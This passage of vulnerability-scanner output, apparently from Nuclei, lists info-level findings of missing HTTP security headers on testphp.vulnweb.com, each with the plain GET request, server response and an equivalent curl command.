'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:31 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:31.540232372Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:31 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:31.540258637Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:31 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:31.540284809Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Root\",\"path\":\"/CVS/Root\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Root\",\"request\":\"GET /CVS/Root HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:32 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:32.089711917Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Root\",\"path\":\"/CVS/Root\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Root\",\"request\":\"GET /CVS/Root HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:32 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:32.089757222Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Root\",\"path\":\"/CVS/Root\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Root\",\"request\":\"GET /CVS/Root HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:32 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:32.089776236Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Root\",\"path\":\"/CVS/Root\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Root\",\"request\":\"GET /CVS/Root HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:32 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:32.089791535Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Root\",\"path\":\"/CVS/Root\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Root\",\"request\":\"GET /CVS/Root HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:32 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:32.089808411Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Root\",\"path\":\"/CVS/Root\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Root\",\"request\":\"GET /CVS/Root HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:32 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:32.089823021Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Root\",\"path\":\"/CVS/Root\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Root\",\"request\":\"GET /CVS/Root HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:32 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:32.089838704Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Root\",\"path\":\"/CVS/Root\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Root\",\"request\":\"GET /CVS/Root HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:32 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:32.089853003Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Root\",\"path\":\"/CVS/Root\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Root\",\"request\":\"GET /CVS/Root HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:32 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:32.14810455Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Root\",\"path\":\"/CVS/Root\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Root\",\"request\":\"GET /CVS/Root HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:32 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:32.148175327Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 